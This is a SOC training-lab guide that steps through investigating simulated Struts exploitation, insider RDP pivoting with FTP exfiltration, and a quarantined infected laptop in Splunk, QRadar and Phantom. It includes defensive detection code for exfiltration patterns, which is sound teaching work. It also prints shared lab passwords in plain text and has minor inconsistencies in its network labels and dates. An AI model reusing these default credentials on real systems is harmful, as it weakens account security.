    For our next investigation, we will look at attack behavior executed during the Smash and Grab activity. The attacker is performing a Smash and Grab, meaning targeting anybody on the Internet with a specific vulnerability. In this example, the vulnerability is a Struts2 vulnerability, which exists on a server within the HackMDs DMZ. That DMZ server has been exploited and the attacker has opened a terminal with root-level access. This is like many real attacks, such as the SamSam ransomware abusing JBoss.

    Procedure


     1   

    Let’s start off by examining Firepower data within the HackMDs SOC Alarm Dashboard. Log into Splunk and view the main landing page. Adjust the time range to July (07/01/2020 and 08/01/2020), similar to what was done earlier in the lab.

    The top part of the HackMDs SOC Alarm Dashboard represents Stealthwatch data used in the previous exercise. If you scroll down, you will notice the second layer of data represents what was pulled from Cisco Firepower data as shown. The start of this area is labeled Firepower Data. The data shown will be different depending on the type of events being seen. For example, if you have not performed the Smash and Grab lab, then Firepower is configured in an IDS mode and will not be blocking events hence why there will be a low IPS Block Events count if that lab is skipped. For now, let’s focus on finding potential successful exploitation behavior against your systems.

     2   

    First, let’s look at the top Indication of Compromise by Host widget. These systems show potential exploitation behavior. There should be a few, and any that are outside systems need to be investigated. Click the magnifying glass to bring up “Open in Search”.

     3   

    In a new window you will see IP addresses of interest at the bottom. Let’s first look at the outside IP address 198.18.133.6. Click it and select View events.

    This will show this outside IP address has connected to an internal system. Not good! Looks like we have a breach!

     4   

    Let’s look into 198.19.20.5, the victim of this attack. Click the IP address and choose View events.

    Looking at the details around this IP address, you will find there was a SERVER-APACHE Struts exploitation, which Attempted Administration Privilege Gain, as well as similar alarms in other logs regarding remote exploitation.

     5   

    Observe that there are other ways you could have found the exploitation behavior. To the right of the widget you used for the last exercise are two other event widgets. One focuses on specific events while the other focuses on event categories. Both show exploitation behavior. You should see the specific Struts attack under Top Events. Click that alarm.

     6   

    Here, you will see all events associated with the Struts exploit. If you click the dest_ip field on the left, you will pull up all victims of this attack, including the system you saw in the previous investigation.

     7   

    Go back to the main Splunk dashboard, scroll down to the Firepower section and look at the Top Events Classes. You will see there are attempted privilege gain alarms meaning somebody is exploiting a system with the goal of gaining administration access. Click the attempted-admin alarm class to pull up those events.

     8   

    Once again, click the dest_ip field on the left to view the impacted devices. This time you not only see the 198.19.20.5 device that was exploited but you also will see the exploited 198.19.30.100 inside device that you found was exploited during the Stealthwatch lab. Using this investigation approach would not only alert you to the struts exploitation activity, but also the follow up insider threat activity which is also aimed at gaining administration access to internal systems.

    These are just a few ways you could have investigated the exploitation behavior using the Firepower logs within Splunk. There are also widgets found on the Splunk Firepower Dashboard as well as the Firepower Splunk application we will cover later in this lab.


    Investigate Compromised Laptop

    For our final investigation, we will be looking at an event that was auto-remediated by ISE. A user with a compromised / infected laptop accessed the HackMDs network. That laptop started performing port scanning and attempted to download malicious software. Firepower saw this behavior and used pxGrid to inform ISE that this asset needs to be removed from the network. Let’s look at this situation from Splunk’s point of view.

    Procedure


     1   

    Log in to Splunk and look at the main HackMDs dashboard. Make sure the time is set properly if you have not performed the previous scenarios today. If you scroll down past the Stealthwatch and Firepower data, you will see ISE data starting with the tile ISE Data.

     2   

    We want to investigate violations of the ISE policy (meaning ISE has auto-quarantined a system), so let’s search the widget that contains this data. Click the widget, and then select Open in Search.

     3   

    This will bring up a search, which includes counting the number of ISE quarantine actions. Remove | stats count as Total so we can focus on the data without counting the events. Your search should look like the following.

    Now you should see the log details. There are a few places to see who is behind the message. You can look at the raw event data, at the bottom or within the log, for the user name and system. You can also click the fields on the left and see a summary of Endpoint and User_Name. You should find the user behind the alarm is dhowser and his IP address is the external address 198.18.133.10.


     4   

    This is an outside IP address, so we need to find its inside IP address via the NATing performed by the VPN concentrator. Let’s search for this using the outside IP address and the NAT field. Search everything using index=*, put in the outside IP address 198.18.133.10, and include the field ASA_NAT_IP=*, which searches the VPN concentrator (our ASA) for the NAT for this address. Your search should now look like the following.

    Note: There is also a widget on the main HackMDs Dashboard that shows all NATing within the ASA.

    You should see the logs of the user dhowser connecting and being NATed to an IP in 198.19.40.5X. For this example, dhowser has the IP address 198.19.40.51.

     5   

    Finally, let’s look for alerts caused by dhowser’s inside IP address. Most likely, Stealthwatch or Firepower saw some malicious behavior and triggered ISE to quarantine this user. Search everything with index=*, the inside IP address you found, and Firepower_Alarm=*, which represents any alarms from Firepower. Your search should look like this.

     6   

    You should see Firepower alarms from this source IP. To get a quick summary, click the field Firepower_Alarm and you should see a few items of concern. Let’s look at the Malware Cloud Lookup event, since that seems to be the only malicious action.

    The log that comes up explains what happened. You can see a malicious file was detected during a download, the hash of the file, the detection name (W32.2546DCFFC5), the location where the file is hosted on the web, and a message explaining malware was found. This action seen by Firepower caused an alarm to be sent to ISE to have this device removed from the network.

    Remember, for this lab, HackMDs has Firepower configured in IDS mode, meaning it let the threat through, used retrospective security to evaluate the file that was downloaded, and alerted ISE that this system has malware. Best practice would be having Firepower in IPS mode to prevent the file from being downloaded; however, we are demonstrating how an IDS can detect internal malicious activity and leverage Cisco ISE as a remediation option when threats make their way onto the network.
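The three searches in this investigation (ISE quarantine to user and outside IP, ASA_NAT_IP to inside IP, Firepower_Alarm from that inside IP) joined in code, which is the cross-product correlation a SOC would normally have the SIEM do. This is an added example, not part of the lab or any vendor app; the log lines, the host tags used to tell the products apart, and every field name other than ASA_NAT_IP, Firepower_Alarm, Endpoint and User_Name are constructed, and the file hash is a placeholder.

```python
"""Correlate an ISE quarantine with ASA NAT and Firepower records.

Added example (not from the lab). The records are constructed; a real SIEM
would distinguish the products by sourcetype rather than the host= tag here.
"""
import re

SAMPLE_LOGS = [
    'host=ise cat=Quarantine User_Name=dhowser Endpoint=198.18.133.10 msg="ANC quarantine applied"',
    'host=asa user=dhowser src=198.18.133.10 ASA_NAT_IP=198.19.40.51 msg="VPN session established"',
    'host=asa user=jdoe src=198.18.133.11 ASA_NAT_IP=198.19.40.52 msg="VPN session established"',
    'host=firepower src=198.19.40.51 Firepower_Alarm="Port Scan" dst=198.19.30.0/24',
    'host=firepower src=198.19.40.51 Firepower_Alarm="Malware Cloud Lookup" sha256=<hash-placeholder> '
    'threat=W32.2546DCFFC5 disposition=Malware uri="http://example.test/update.exe"',
    'host=firepower src=198.19.40.52 Firepower_Alarm="Connection Event" dst=198.19.20.5',
]

_KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_kv(line):
    """Turn 'k=v k2="v with spaces"' into a dict (like Splunk field extraction)."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in _KV.finditer(line)}


def quarantined_endpoints(events):
    """(user, outside_ip) pairs taken from ISE quarantine records."""
    return [(e["User_Name"], e["Endpoint"]) for e in events
            if e.get("host") == "ise" and e.get("cat") == "Quarantine"]


def nat_inside_ip(events, outside_ip):
    """Search '<outside_ip> ASA_NAT_IP=*': the inside address the ASA assigned."""
    for e in events:
        if e.get("host") == "asa" and e.get("src") == outside_ip and "ASA_NAT_IP" in e:
            return e["ASA_NAT_IP"]
    return None


def firepower_alarms(events, inside_ip):
    """Search '<inside_ip> Firepower_Alarm=*'."""
    return [e for e in events
            if e.get("host") == "firepower" and e.get("src") == inside_ip
            and "Firepower_Alarm" in e]


def correlate(lines):
    """Per quarantined user: outside IP -> NATed inside IP -> Firepower alarms."""
    events = [parse_kv(line) for line in lines]
    report = {}
    for user, outside_ip in quarantined_endpoints(events):
        inside_ip = nat_inside_ip(events, outside_ip)
        # No NAT record means the VPN session was not logged; report that instead of guessing.
        alarms = firepower_alarms(events, inside_ip) if inside_ip else []
        report[user] = {
            "outside_ip": outside_ip,
            "inside_ip": inside_ip,
            "alarms": sorted({a["Firepower_Alarm"] for a in alarms}),
            # Malware Cloud Lookup carries the file details the lab points at.
            "malware": [{"threat": a.get("threat"), "sha256": a.get("sha256"),
                         "uri": a.get("uri")} for a in alarms
                        if a["Firepower_Alarm"] == "Malware Cloud Lookup"],
        }
    return report


if __name__ == "__main__":
    for user, detail in correlate(SAMPLE_LOGS).items():
        print(user, detail)
```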


    Splunk Applications

    Our final Splunk topic is Splunk Applications. Splunk is known for its user-based app development community found at splunkbase.splunk.com. Splunkbase features hundreds of apps covering pretty much every vendor and technology concept used in the IT industry. For example, searching the term Cisco within Splunkbase brings up around 65 different applications. Feel free to search Splunkbase for the technologies and concepts used within your work environment to see what apps are available.

    Procedure


     1   

    For this next exercise, we will look at the Cisco Firepower App for Splunk. This application is installed within our Splunk build as the last application at the bottom of the app list. Click the tab to open it.

     2   

    You will see a dashboard dedicated to managing Cisco Firepower network event data. By default, all data displayed is dated back 24 hours. You can use the search and dropdown table located at the top of the dashboard to zero in on data of interest, such as the attacker IP used in previous labs. For example, you should see the attacker’s system IP address of 198.18.133.6 if you have performed an attack or adjusted the time to when we delivered the attacks. Click that IP address to pull up more details on this host.

    From here you will see details on any incident associated with this IP address. If you click any details, it will cross-launch Cisco Firepower so you can dig further with Cisco Firepower like we did in the Smash-n-Grab lab.

     3   

    Next let’s go to the top of the page, click Threats, and then choose Intrusion Events to bring up the Intrusion section of the application.

    Here, you will see a summary of intrusion events found by Cisco Firepower. If you scroll down, you will find more details on threats. Feel free to click any of these items to learn more about the events.

     4   

    Click Network to see the Network section of the application.

    Note that this part of the application shows a summary of the type of network traffic seen by Firepower. Feel free to explore this application. It was designed for quickly searching specific types of data that are common for security operation centers to monitor. This application showcases the power of the Splunk application network, which has hundreds of customized applications that enhance the value provided by Splunk.

    The steps above summarize hunting for a few very specific attacks within the various logs ingested by Splunk. A real-world SOC would more likely start by monitoring all events and hunting for anything seen as critical rather than knowing in advance which specific threats to hunt for. Most SOCs would leverage data correlation between products rather than isolating data as we did for these exercises.

    For example, having the ASA NAT records mixed with other data would simplify stitching attacker outside and inside IP information. Blending Firepower and Stealthwatch data would provide even more details about an event, much like how you saw both systems had events regarding the unauthorized RDP connections.


    NVM Module App for Splunk: Overview

    Another very cool feature is the ability to analyze and correlate user and endpoint behavior using the AnyConnect Network Visibility Module (NVM) app within Splunk. Imagine being able to collect details about users, the device AnyConnect is installed on, what applications are running, and the destinations of flows within or outside your network, to name a few items you typically would not be able to see without host-level visibility. This is a huge complement to signature-based security tools such as antivirus.

    Procedure


     1   

    To view the Cisco NVM app, click the Cisco NVM Dashboard app on the bottom right of the main dashboard.

    You will see a high-level dashboard breaking down NVM topics into multiple categories. Clicking a category will bring up that specific dashboard. Let’s first look at the devices.

    In other labs, we had to investigate websites HackMDs employees visited. Using the NVM app, you can quickly view the websites Dr Howser has visited by clicking his name and then scrolling down to see those websites. This can be useful when identifying top sources or if there is questionable activity from a host.

     2   

    At the top of the App is an NVM Analytics Dashboard drop-down menu. When you click this, you will see there are a dozen dashboards to check out. One interesting one is the process listing. Click that.

    There are a few labs where you need to figure out where malware installed on a compromised system is located, what it communicates with, and what changes it is making on the host it is installed on. The NVM module can easily show this activity. Remember this as you work through some of the other challenges and hunting labs. For example, do you remember the process of interest that was running when the TeslaCrypt ransomware was installed?

    Feel free to start with the HackMDs SOC Alarm Dashboard and investigate any alarms that seem interesting. You can also investigate alarms found within the installed applications listed on the left-hand side of the Splunk main dashboard. The NVM and Firepower Apps are just a few we touched on however, there are hundreds of applications available within the Splunk community. Take some time to click around. Happy Splunking.


    IBM QRadar Lab

    Attack Data in QRadar

    For this lab, we have not created fake attack data. Instead, we have launched all the attacks you have executed in other CDC modules at a specific point in time. For some of the data modules, you will need to adjust the time range to July 01 through August 1st, 2020, in order to see the attack data, unless you have created the data yourself while working on other CDC modules. You are welcome to perform other CDC modules to learn more about how to deliver the attacks you are now going to investigate.

    Important: 

    If you performed Scenario 3 (Smash and Grab), Scenario 5 (Insider Threats) and Scenario 6 (Controlling Access and Monitoring for Malicious Threats) prior to starting this lab, you do not have to change the time of any QRadar module and can just search the last 24 hours (the default time setting) to see your attack behavior for any of the exercises in this lab. If this applies to you, you can just use the default time, which is 24 hours. This should have the attacks you performed within QRadar’s data history. If you have not performed those scenarios, make sure to adjust the time range for the widgets so the dates are between February 15 and March 1st.

    QRadar Overview

    IBM’s QRadar is a SIEM designed for security awareness and compliance support. QRadar uses a combination of flow-based network knowledge, security event correlation, and asset-based vulnerability assessment. Let’s touch on a few key areas of QRadar before starting our investigations. Notice the widgets on the dashboard. We will be using these to hunt for events shortly.

    Procedure


     1   

    Let’s start off by accessing QRadar (qradar.ad.hackmds.com) and viewing the different dashboards. Access QRadar using the browser fast link and log in with admin / C1sco12345.

     2   

    When you log in, you will notice you start out on a dashboard. There are many default dashboards that can be customized, or a new dashboard can be created such as the one we created called HackMDS SOC View. Dashboards are made up of widgets, which represent specific search data such as “Top IPS Events.” If the HackMDS SOC View dashboard isn’t up, click it under the Show Dashboard drop-down to bring it up.

     3   

    Note that all the widgets are based on active searches. You can search for pretty much anything collected by QRadar and turn it into a widget. You will try this out during the investigation part of this lab. Now click the Offenses tab.

     4   

    You can see that this shows the top offenses you should look into if you are responsible for security at HackMDS. Think of this tab as the top things to investigate right now. On the left are different focus areas, including categories of offenses and top sources and destinations, which may be of interest to review. Next, click the Assets tab.

     5   

    Click the Assets tab at the top of the page to see a list of any device(s) seen by QRadar. You can set up QRadar to scan networks for new devices to help maintain an inventory of what is on the network. You should see results from scanning the HackMDS network.

     6   

    QRadar also offers integration with leading vulnerability scanners, or it can use a built-in scanner to scan assets for weaknesses. For this lab, we have integrated Rapid7’s InsightVM to provide this data. One powerful feature is the ability to launch Rapid7 InsightVM scans from the QRadar dashboard. You should see vulnerability data associated with assets identified by InsightVM. Click the system with the most vulnerabilities, which in this example is 198.19.30.100. This example system shows over 2000 vulnerabilities! To bring up the details found by both InsightVM and QRadar, click the system IP address and scroll down.

    Notice you can see the vulnerability details associated with this system including the risk score of each potential vulnerability. Somebody should really patch this system at some point!

    QRadar has optional plugins that can be installed to provide additional value. There aren’t as many application options as Splunk offers, and modules have limitations for customization, but applications such as Pulse can be very useful.

    We will view QRadar applications later in this lab. Now it’s time to start our investigation. Let’s first look into the insider threat from Scenario 5.


    Investigate an Insider Threat

    For our first investigation, we will look for the attack performed in Scenario 5 “Identifying an insider threat”. The attacker has accessed the inside network using RDP (3389/tcp) with stolen credentials. Once inside the 198.19.30.X network, the attacker performed scanning to find other systems to access laterally, leveraging the same stolen administrator credentials used to access the inside network. The attacker’s goal is to capture sensitive data by pivoting into the HIPAA network (198.19.10.x). Once the attacker compromised a system within that network, the attacker identified sensitive data on that system and exported it off the network using FileZilla. Your job is to identify the Remote Desktop behavior (3389/tcp), internal recon, pivot, and exfiltration activity using the Stealthwatch data found within QRadar.

    The first behavior of interest from this attack is identifying any compromise of a sensitive system. A compromise means any system within the PCI network (198.19.10.x) being accessed by a system on another network or outside of the HackMDs network.

    We start by examining the SOC dashboard. We have built an Exfiltration widget that monitors when data is pulled from a network using NetFlow from Stealthwatch. Within that widget, you will notice one IP address comes from the internal PCI network. This is a critical issue and needs to be addressed right away.

    Procedure


     1   

    Let’s click View in Log Activity.

    This action will bring up details about this data breach. It’s time to filter in on the impacted system.

     2   

    Click Search, and then Select New Search.

    This brings up QRadar’s search capabilities. The first thing to do is specify a time.

     3   

    If you performed the modules stated at the beginning of this lab, you can look for the attack behavior you created by selecting the last 24 hours via the Recent option. If you did not, choose the dates 07/01/2020 and 8/01/2020.

     4   

    Scroll down until you see the search parameters. Type 198.19.10.101 so we can look at all activity associated with this system that sits within the HackMDs PCI network. Click the Add Filter button to add it to the search.

     5   

    Click the Search button to start the search.

    You will find details regarding the data exfiltration event. First, you will see that the Stealthwatch event related to 198.19.10.101 links to a source IP of 198.19.30.100. This connection occurred over RDP (3389), meaning a system within HackMDs but outside of the PCI network connected to a system within the PCI network. You will also see that a system outside of the network (198.18.133.6) connected and that the FTP protocol (port 21) was used. Lastly, you will see that the dhowser account was used. This single page clearly shows what went down, which is a major incident. Time to alert leadership and higher-level support about this security incident!
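    The same three behaviors this investigation surfaces by hand (internal recon, an RDP pivot into the 198.19.10.x segment, and FTP to an outside host) can be expressed as detection logic over flow records. The following is an added example written for this guide, not QRadar or Stealthwatch code; the flow records are constructed, and treating all of 198.19.0.0/16 as the HackMDs internal space is an assumption.

```python
"""Flag the insider-threat pattern from this lab over constructed flow records."""
import ipaddress
from collections import defaultdict

# Network boundaries used in this lab. INTERNAL_NET is an assumption: all
# HackMDs address space is treated as 198.19.0.0/16.
PCI_NET = ipaddress.ip_network("198.19.10.0/24")
INTERNAL_NET = ipaddress.ip_network("198.19.0.0/16")
RECON_THRESHOLD = 5  # distinct internal hosts touched by one source before we call it a scan

# Constructed sample flows (not real Stealthwatch output):
# (timestamp, src, dst, dst_port, proto, user, bytes_sent)
SAMPLE_FLOWS = [
    ("2020-07-14T09:00:01", "198.19.30.100", "198.19.30.11", 445, "tcp", "dhowser", 1200),
    ("2020-07-14T09:00:02", "198.19.30.100", "198.19.30.12", 445, "tcp", "dhowser", 1200),
    ("2020-07-14T09:00:03", "198.19.30.100", "198.19.30.13", 445, "tcp", "dhowser", 1200),
    ("2020-07-14T09:00:04", "198.19.30.100", "198.19.30.14", 445, "tcp", "dhowser", 1200),
    ("2020-07-14T09:00:05", "198.19.30.100", "198.19.30.15", 445, "tcp", "dhowser", 1200),
    # RDP from the 30.x network into the PCI segment (the pivot)
    ("2020-07-14T09:05:00", "198.19.30.100", "198.19.10.101", 3389, "tcp", "dhowser", 540000),
    # FTP from the PCI host straight to an outside address (the exfiltration)
    ("2020-07-14T09:20:00", "198.19.10.101", "198.18.133.6", 21, "tcp", "dhowser", 8400000),
    # Benign traffic that must not be flagged
    ("2020-07-14T09:21:00", "198.19.10.101", "198.19.10.102", 3389, "tcp", "jsmith", 9000),
    ("2020-07-14T09:22:00", "198.19.30.50", "93.184.216.34", 443, "tcp", "alice", 2000),
]


def is_internal(ip):
    return ipaddress.ip_address(ip) in INTERNAL_NET


def is_pci(ip):
    return ipaddress.ip_address(ip) in PCI_NET


def classify_flow(flow):
    """Return the set of tags a single flow earns."""
    _, src, dst, dport, proto, _, _ = flow
    tags = set()
    # RDP into the PCI segment from any source outside that segment
    if proto == "tcp" and dport == 3389 and is_pci(dst) and not is_pci(src):
        tags.add("pci_rdp_ingress")
    # FTP from a PCI host to a destination outside HackMDs
    if proto == "tcp" and dport == 21 and is_pci(src) and not is_internal(dst):
        tags.add("pci_ftp_egress")
    return tags


def find_recon(flows, threshold=RECON_THRESHOLD):
    """Map each source that touched at least `threshold` distinct internal hosts to that count."""
    targets = defaultdict(set)
    for _, src, dst, *_ in flows:
        if is_internal(src) and is_internal(dst) and src != dst:
            targets[src].add(dst)
    return {src: len(hosts) for src, hosts in targets.items() if len(hosts) >= threshold}


def investigate(flows):
    """Group the flows into the three findings this investigation looks for."""
    findings = {"pci_rdp_ingress": [], "pci_ftp_egress": [], "recon": find_recon(flows)}
    for flow in flows:
        for tag in classify_flow(flow):
            findings[tag].append(flow)
    return findings


def involved_users(findings):
    """Accounts seen on the pivot or exfiltration flows (the page's 'dhowser' finding)."""
    return {flow[5] for key in ("pci_rdp_ingress", "pci_ftp_egress") for flow in findings[key]}


if __name__ == "__main__":
    result = investigate(SAMPLE_FLOWS)
    for key, value in result.items():
        print(key, value)
    print("accounts involved:", involved_users(result))
```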

    Now, let’s move to our next investigation.


    Investigate Exploitation Behavior

    For our next investigation, we will look at attack behavior executed during Scenario 3 “Smash and Grab”. The attacker is performing a Smash and Grab, meaning targeting anybody on the Internet with a specific vulnerability. In this example, the vulnerability is a Struts2 vulnerability, which exists on a server within the HackMDs DMZ. That DMZ server has been exploited and the attacker has opened a terminal with root-level access. This is like many attacks, such as the SamSam ransomware abusing JBoss.

    Procedure


     1   

    Let’s start off by going back to the main HackMDS SOC View Dashboard. This time we want to investigate the exploitation behavior against the Apache Struts vulnerability. The first place we can look is within the Exploits by Type widget. We can see Remote Code Executed, which is bad and something we should investigate. Double-click “View in Log Activity” to get more details on these events.

    This will bring you to the Log Activity tab for these events, meaning a filter is applied to see Exploits by Type. You first need to make sure you have adjusted the time to July 1st – July 30th.

     2   

    Scroll down so you can see the categories of attack. We are interested in the Remote Code Execution, so let’s click Multiple under Source IP to see details on the source of this attack.

     3   

    Scroll down further to find there are two systems associated with this attack. One has an outside IP address of 198.18.133.6. This isn’t good. Let’s click Multiple next to this IP to see how this external system launched a remote code attack.

    This will bring up details around the attack that is covered in the exploit of the Struts vulnerability module in this document.

    You can see who the attacker is, what exploit they used, and which systems were impacted. It’s time to alert leadership about this critical breach!

    Note that there may be other ways to identify this exploitation behavior using QRadar. As you can see, the event data is clear and easy to follow, regarding which systems are being attacked, what type of attack was used, and why the attack was successful. This tells you how vulnerable the target of the attack currently is. Next, we will move on to the insider threat behavior.


    Investigate Compromised Laptop

    For our final investigation, we will be looking at an event that was auto-remediated by ISE. A user with a compromised / infected laptop accessed the HackMDs network. That laptop started performing port scanning as well as attempting to download malicious software. Firepower saw this behavior and used pxGrid to inform ISE that this asset needs to be removed from the network. Let’s look at this situation from QRadar’s point of view.

    Procedure


     1   

    Let’s go back to the HackMDS SOC View dashboard.

    Be aware that our concern is ISE implementing a quarantine on a VPN user due to some violation in policy. We have created a widget that monitors for “quarantine” alarms from ISE called “VPN Quarantine” located on the bottom right of the SOC dashboard. You will see 198.19.40.51 stands out as a top violator.

    If you don’t see any events, it’s likely you have not adjusted the time. That’s OK. We can adjust the time in the next step.

     2   

    Click View in Log Activity to see more details.

     3   

    First, make sure the time is correct regarding when you are looking for Quarantine activity. If you have not performed the compromised laptop lab, set the time between July 1st, 2020 and August 1st, 2020.

    Details will show these are CORRELATION EVENTS meaning events triggered by Firepower, which tell ISE to quarantine the device. We can see dhowser is associated with some of these events.

    The SOC would investigate the user’s status within Cisco ISE; the next image shows how dhowser has been quarantined.

    There could be many other ways to find this and other malicious activity using QRadar. The native search and dashboards also showcase details that could lead a SOC towards these events as well as the desktop support team using the vulnerability data found under the assets tab. Feel free to explore the QRadar dashboard to learn more about this fantastic security event and information management product.

    Congratulations! You have now completed this scenario.


    SOAR: Automation and Response with Splunk Phantom

    Value Proposition: Being able to identify and contain an attack is valuable to your SOC. However, having the capability to automate a series of actions puts your SOC in an even better position to quickly remediate threats. Automation leads to saved time, consistent responses, and faster results. The entire security industry is moving towards automation and orchestration as these capabilities lead to a mature security operation center (SOC).

    Outcome

    In this scenario, you will have a basic understanding of how a SOAR such as Phantom can automate tasks for a threat response situation. Specifically, you will see how Phantom can automate the following tasks leveraging two Playbooks:

    • Disable a user account in Active Directory

    • Re-enable a user account in AD after learning the employee was an innocent bystander

    Lab Resources

    • SIEM: Splunk Enterprise

    • SOAR: Splunk Phantom

    • SIEM Data Resources: Firepower, Stealthwatch, ISE

    • Installed Phantom Applications: Cisco Firepower App, Cisco ISE, VirusTotal

    In this lab, you represent the HackMDs SOC manager. After attending the Black Hat and DEF CON conferences, you have learned about the value of applying automation and orchestration to your SOC to improve your incident response service. You convinced leadership to acquire a SOAR known as Splunk Phantom, and the Splunk Phantom consultant assisted with building two playbooks designed around how your SOC responded to a recent breach caused by an insider threat. You will now oversee how Phantom is used to prevent a future internal breach.

    Phantom events are based on what is seen by Splunk. All HackMDs security tools send events to Splunk hence Phantom’s alarms are a consolidated view of all security events processed by Splunk. The value of Phantom is to quickly be able to investigate events and eventually automate response when applicable.

    Execute Existing “Disable AD User” Playbook

    For this first situation, you will be executing an existing playbook named "Disable AD User" when an internal system is identified as being compromised. Your SOC developed this playbook based on the Cyber Defense Clinic "Insider Threat" scenario where one of your internal hosts was found to be compromised and exfiltrating sensitive data from the HackMDs doctor network. Your SOC was able to identify the compromised system as a contractor PC, based on malicious behavior seen from the system, including port scanning, remote desktop access between networks and HIPAA-related data being sent off-network. Did the contractor inadvertently download a malicious file? Or perhaps the credentials of this user had been compromised and a malicious actor logged into the contractor PC to detonate the malware? We need to find out by investigating Phantom’s event logs. Phantom is configured to receive security events seen by your SOC’s SIEM, Splunk, which is your centralized data collection tool. See the "Execute a Centralized Defense" scenario to learn more about the value of a SIEM including Splunk and QRadar.

    In the first part of this scenario, you will research recent event activity. If you identify a compromised host, you can leverage the new Disable AD User playbook to automate your response.

    Procedure


     1   

    Using the Windows Jump Host, launch the Firefox browser. Select the Phantom | Dashboard bookmark to access the Phantom dashboard. You can also go to https://198.19.10.150. Log in with admin / C1sco12345.

     2   

    From the Phantom dashboard home page, select the Home tab from the menu bar. You will see various widgets that describe a summary of events, playbooks, and automation ROI metrics. Ensure that the time range on the top left is set to Last Year. Click the Events by Status widget.

     3   

    This will bring up the Events view table. Select the search field in the top left of the screen and type Contractor to search for events associated with your contractors. You are doing this based on how, in the past, your contractors have been the source of internal threats. You should see an event displayed in the list with name Malware_from_Contractor. Select that event.

     4   

    In the next screen, you will see a timeline of when that ‘Malware_from_Contractor’ event was seen. You will also see Activity, Workbook, and Guidance tabs on the left that can help you investigate this event. Let’s look at the details of the ‘Malware_from_Contractor’ event by clicking it.

     5   

    An Artifact Details window displays the details associated with this event, such as the Name, Start time, Severity, etc. Note in the Artifact Details window that the ‘sourceUserName’ is dhowser.

     6   

    Great, it looks like one of your contractors named dhowser is possibly compromised. Let’s further investigate this user, by searching for events for the username dhowser. Select the green CLOSE button to close the Artifact Details window. You will be returned to the Investigation Timeline screen. Type ‘dhowser’ into the search field:

     7   

    Scroll down and view the associated events with dhowser. You will see a few ‘Data_Exfiltration’ events. Oh no, you once again have data leaving your sensitive network! Click the event and you will be taken to the Investigation page with a focus on this event.

     8   

    Click the event details name Data Exfiltration and you will see the Artifact Details below it. Notice the sourceUsername for this event is also dhowser. This confirms that his system is the source of the trouble.

    You have all the evidence you need to confirm this system is a threat to the HackMDs network. You could also perform similar threat hunting within Splunk, as was done in the "Execute a Centralized Defense (Splunk and IBM QRadar)" scenario. However, Splunk cannot take any actions, since it is a SIEM. It's time to use a Phantom Playbook to disable the dhowser account in AD and notify HR! This represents a common use case for a SOAR.

     9   

    Search again for the username dhowser. This time, select the Malware_From_Contractor event:

     10   

    Let’s use the Guidance tab to run the playbook. Select the Guidance tab, then under PLAYBOOKS, click the playbook named CDC_V4_Malicious_insider_containment. Click the green RUN PLAYBOOK button to run the playbook:

     11   

    To check the status of (and, if needed, interact with) the playbook, click the Activity tab. Scroll down to the playbook you just launched. You can click the triangles to open details about what the playbook launched. Click the triangle next to CDC_V4_malicious_insider_user.

    Note: 

    You will not want to run this playbook against any activity that the playbook has already run against. You can tell which actions have been performed by noticing the white checkmarks beside those actions. If you run the playbook and see the following error message, that means the playbook has already been launched against the event. Please go back and choose a different Malware_From_Contractor event. You want to find one that does not have all of the white checkmarks, which means all actions have NOT been taken.

     12   

    You will see a white check next to playbook items that have completed, and a clock symbol next to items that require your interaction. Click the Notify_HR text next to the clock symbol. This will allow you to type an explanation to HR.

    Note: 

    Not all actions are checked, since not all actions have been completed yet.

     13   

    Type an appropriate response, such as “Disabling dhowser user account pending further investigation,” and then press the green COMPLETE button:

     14   

    Next, let’s confirm we want to disable the dhowser account. To do so, click the User_disabling step in the playbook.

     15   

    This will bring up a separate window which will prompt you to select Yes to confirm disabling the user. After selecting Yes, press the green COMPLETE button:

     16   

    Now let’s confirm that the dhowser account has indeed been disabled. Try logging into the DR workstation to confirm the dhowser user has been disabled. You can log in to the DR workstation by using the Remote Desktop link on the Jumphost desktop:

     17   

    Log in with username hackmds/dhowser and password C1sco12345. You should notice that the account has been disabled:


    Re-enable Impacted User Playbook

    Procedure


     1   

    Now, let’s assume that some remediation was taken and the dhowser system is now allowed back on the network. Let’s re-enable the dhowser account with another Phantom playbook. On the Phantom INVESTIGATION page, click the Guidance tab on the left. In the Guidance tab, click the CDC_v4_Enable_User playbook, and then confirm running the playbook by clicking the green RUN PLAYBOOK button.

     2   

    After re-enabling the dhowser user, try logging back into the DR workstation. You will be able to successfully log in.

     3   

    Next, let’s take a closer look by reviewing the “Disable AD User” playbook. Go back to the homepage dashboard and select Home and then Playbooks.

     4   

    From this screen, search CDC to narrow your search and select the playbook named CDC_v4_malicious_insider_user_containment.

     5   

    You will notice the Playbook editor screen displays, with a playbook that looks similar to the following image.

     6   

    Investigate each of the logic blocks. You will see some CEF (Common Event Format) fields that are used. For example, click the file reputation block, and then click Python Playbook Editor to see that the CEF field (artifact:*.cef.fileHash) is used to populate the container_data variable:

     7   

    Repeat the same process for the get user attributes block and you will see CEF field sourceUserName (artifact:*.cef.sourceUserName) as the identifier of the malicious insider/stolen credential.

     8   

    From the sourceUserName CEF field, the user attributes are obtained from LDAP for the purpose of documenting details. The format block following the get user attributes action handles this. The next step is to prompt the SOC analyst (or other user selected by playbook user/author) about whether the containment actions on the user should be carried out. If the response is positive (User chooses option YES), then the disable user call is executed using LDAP. This could be followed by a ticket being created in a ticket management solution such as ServiceNow. The event is closed at the end of the playbook run.


    At the start of the playbook and in parallel to the automated action execution, the file hash for the event is checked with VirusTotal. In addition, a manual task is assigned to the admin (or other user selected by the playbook user/author) to notify HR of the malicious insider/stolen account event.

    Use NIST 800-61 for Case Management

    Now that you have successfully used your playbooks as part of your incident response program, the next step would be to incorporate them into your incident response program. One popular industry guideline for handling computer security incidents is NIST 800-61. Phantom allows events to be run through NIST 800-61 best practices, which include activities involved with the following:

    • Detection – How to detect that an event has occurred and confirm it is a true positive

    • Analysis and Containment – How to identify all impact and contain the threat from spreading

    • Eradication – How to remove the threat from all systems

    • Recovery – What steps are needed to return all impacted systems and networks to a normal operation state

    • Post incident Activity – What was learned and how can the SOC improve the response

    Procedure


     1   

    Any event in Phantom can be run through the NIST 800-61 process. Click the Splunk Phantom logo on the top left to go to the home page. Search for “contractor” to bring up the events we already investigated. Select any event.

     2   

    You should see the event details. This time, let’s click the folder icon at the top right.

     3   

    We can promote the event to a case using a NIST 800-61 Workbook, or we can create our own Workbook. In this case, select the NIST 800-61 Workbook to use NIST 800-61:

     4   

